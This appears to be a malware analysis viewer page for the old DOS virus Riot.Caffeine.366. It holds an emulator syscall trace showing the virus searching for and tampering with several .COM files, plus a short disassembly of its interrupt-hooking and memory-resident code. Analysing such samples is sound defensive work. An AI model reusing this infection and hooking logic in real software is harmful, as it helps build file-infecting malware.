Sample viewer

vx.netlux.org/Virus.DOS.Riot.Caffeine.366

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:32:13.620019511Z 26 PC: 12a8d | Set disk transfer address
2018-12-17T22:32:13.622761034Z 78 PC: 12a95 | Find first file
2018-12-17T22:32:13.630733771Z 67 PC: 12ab3 | Get or set file attributes
2018-12-17T22:32:13.650867922Z 61 PC: 12ab8 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:32:13.658931529Z 63 PC: 12ac4 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:32:13.667945698Z 66 PC: 12acc | Move file pointer
2018-12-17T22:32:13.669958475Z 87 PC: 12b12 | Get or set file date and time
2018-12-17T22:32:13.672259695Z 62 PC: 12b16 | Close file
2018-12-17T22:32:13.681577175Z 67 PC: 12b25 | Get or set file attributes
2018-12-17T22:32:13.693313278Z 79 PC: 12a95 | Find next file
2018-12-17T22:32:13.697935458Z 79 PC: 12a95 | Find next file
2018-12-17T22:32:13.701739432Z 67 PC: 12ab3 | Get or set file attributes
2018-12-17T22:32:13.713135647Z 61 PC: 12ab8 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:32:13.721012346Z 63 PC: 12ac4 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:32:13.72974491Z 66 PC: 12acc | Move file pointer
2018-12-17T22:32:13.73172798Z 87 PC: 12b12 | Get or set file date and time
2018-12-17T22:32:13.7341564Z 62 PC: 12b16 | Close file
2018-12-17T22:32:13.74239987Z 67 PC: 12b25 | Get or set file attributes
2018-12-17T22:32:13.754578744Z 79 PC: 12a95 | Find next file
2018-12-17T22:32:13.758003968Z 67 PC: 12ab3 | Get or set file attributes
2018-12-17T22:32:13.770126581Z 61 PC: 12ab8 | Open file (Filename = 'PHANG.COM')
2018-12-17T22:32:13.779055986Z 63 PC: 12ac4 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:32:13.786654032Z 66 PC: 12acc | Move file pointer
2018-12-17T22:32:13.788749867Z 87 PC: 12b12 | Get or set file date and time
2018-12-17T22:32:13.792161135Z 62 PC: 12b16 | Close file
2018-12-17T22:32:13.808399053Z 67 PC: 12b25 | Get or set file attributes
2018-12-17T22:32:13.819602409Z 79 PC: 12a95 | Find next file
2018-12-17T22:32:13.823173545Z 67 PC: 12ab3 | Get or set file attributes
2018-12-17T22:32:13.834629817Z 61 PC: 12ab8 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:32:13.842122317Z 63 PC: 12ac4 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:32:13.850000177Z 66 PC: 12acc | Move file pointer
2018-12-17T22:32:13.851772641Z 87 PC: 12b12 | Get or set file date and time
2018-12-17T22:32:13.853643552Z 62 PC: 12b16 | Close file
2018-12-17T22:32:13.861850791Z 67 PC: 12b25 | Get or set file attributes
2018-12-17T22:32:13.873660573Z 79 PC: 12a95 | Find next file
2018-12-17T22:32:13.877208719Z 67 PC: 12ab3 | Get or set file attributes
2018-12-17T22:32:13.888219447Z 61 PC: 12ab8 | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:32:13.897341329Z 63 PC: 12ac4 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:32:13.9049878Z 66 PC: 12acc | Move file pointer
2018-12-17T22:32:13.907077999Z 87 PC: 12b12 | Get or set file date and time
2018-12-17T22:32:13.909870003Z 62 PC: 12b16 | Close file
2018-12-17T22:32:13.917825709Z 67 PC: 12b25 | Get or set file attributes
2018-12-17T22:32:13.928888442Z 79 PC: 12a95 | Find next file
2018-12-17T22:32:13.933013441Z 67 PC: 12ab3 | Get or set file attributes
2018-12-17T22:32:13.943824594Z 61 PC: 12ab8 | Open file (Filename = 'PAH.COM')
2018-12-17T22:32:13.951188206Z 63 PC: 12ac4 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:32:13.960195858Z 66 PC: 12acc | Move file pointer
2018-12-17T22:32:13.962049739Z 87 PC: 12b12 | Get or set file date and time
2018-12-17T22:32:13.964006892Z 62 PC: 12b16 | Close file
2018-12-17T22:32:13.972188728Z 67 PC: 12b25 | Get or set file attributes
2018-12-17T22:32:13.9831714Z 79 PC: 12a95 | Find next file
2018-12-17T22:32:13.986431751Z 67 PC: 12ab3 | Get or set file attributes
2018-12-17T22:32:13.997598675Z 61 PC: 12ab8 | Open file (Filename = 'TEST.COM')
2018-12-17T22:32:14.006485812Z 63 PC: 12ac4 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:32:14.00979161Z 66 PC: 12acc | Move file pointer
2018-12-17T22:32:14.011571387Z 87 PC: 12b12 | Get or set file date and time
2018-12-17T22:32:14.014585602Z 62 PC: 12b16 | Close file
2018-12-17T22:32:14.02614858Z 67 PC: 12b25 | Get or set file attributes
2018-12-17T22:32:14.037388698Z 79 PC: 12a95 | Find next file
2018-12-17T22:32:14.041020473Z 44 PC: 12b2e | Get time 0x12b2e: cmp dl, 4
0x12b31: jb 0x12b45
0x12b33: jmp 0x12b65
0x12b35: cmp ax, 0x4b00
0x12b38: je 0x12b3f
0x12b3a: ljmp ptr cs:[0x26d]
0x12b3f: mov ah, 0x3c
0x12b41: int 0x21
0x12b43: int 0x20
0x12b45: mov ax, 0x3521
0x12b48: int 0x21
0x12b4a: mov word ptr cs:[0x26d], bx
0x12b4f: mov word ptr cs:[0x26f], es
0x12b54: mov ax, 0x2521
0x12b57: lea dx, word ptr [bp + 0x1f5]
0x12b5b: int 0x21
0x12b5d: lea dx, word ptr [bp + 0x205]
0x12b61: int 0x27
0x12b63: int 0x20
0x12b65: mov dx, 0x80
2018-12-17T22:32:14.043644449Z 26 PC: 12b6c | Set disk transfer address